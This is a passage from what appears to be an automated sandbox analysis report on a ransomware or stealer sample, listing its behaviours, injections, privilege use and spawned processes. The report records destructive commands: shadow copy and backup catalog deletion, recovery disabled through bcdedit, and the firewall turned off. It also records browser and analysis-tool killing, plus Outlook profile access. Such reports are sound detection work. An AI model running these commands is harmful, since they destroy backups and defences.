N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A

Gathers system information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A

GoLang User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\8846.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [DER certificate blob omitted; its encoded subject reads "Internet Security Research Group" / "ISRG Root X1"] C:\Users\Admin\AppData\Local\Temp\8846.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\system32\certreq.exe
PID 2256 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\system32\certreq.exe
PID 2256 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\system32\certreq.exe
PID 2256 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\system32\certreq.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 1048 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4428 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5044 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5044 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4428 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4428 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5044 wrote to memory of 3900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5044 wrote to memory of 3900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5044 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 5044 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 5044 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 5044 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 5044 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 5044 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2572 wrote to memory of 1788 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8846.exe
PID 2572 wrote to memory of 1788 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8846.exe
PID 2572 wrote to memory of 3320 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3320 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3320 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3320 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1788 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\curl.exe
PID 1788 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\curl.exe
PID 2572 wrote to memory of 296 N/A C:\Windows\Explorer.EXE C:\Windows\explorer.exe
PID 2572 wrote to memory of 296 N/A C:\Windows\Explorer.EXE C:\Windows\explorer.exe
PID 2572 wrote to memory of 296 N/A C:\Windows\Explorer.EXE C:\Windows\explorer.exe
PID 2572 wrote to memory of 3744 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3744 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3744 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3744 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1788 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\SYSTEM32\cmd.exe
PID 1788 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\SYSTEM32\cmd.exe
PID 1788 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 2572 wrote to memory of 4912 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 4912 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 4912 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 4912 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1788 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 2572 wrote to memory of 2836 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 2836 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 2836 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 2836 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1788 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\runas.exe
PID 1788 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\runas.exe
PID 2572 wrote to memory of 4620 N/A C:\Windows\Explorer.EXE C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe

"C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe"

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2256 -ip 2256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 816

C:\Users\Admin\AppData\Local\Microsoft\84`.exe

"C:\Users\Admin\AppData\Local\Microsoft\84`.exe"

C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe

"C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe"

C:\Users\Admin\AppData\Local\Microsoft\84`.exe

"C:\Users\Admin\AppData\Local\Microsoft\84`.exe"

C:\Users\Admin\AppData\Local\Microsoft\xUZbuun.exe

"C:\Users\Admin\AppData\Local\Microsoft\xUZbuun.exe"

C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe

"C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2212 -ip 2212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 460

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\8846.exe

C:\Users\Admin\AppData\Local\Temp\8846.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\SYSTEM32\cmd.exe

cmd /c

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM edge.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\runas.exe

runas /user:Administrator C:\Users\Admin\AppData\Local\Temp\8846.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq regedit.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM regedit.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq taskmgr.exe"

C:\Windows\explorer.exe

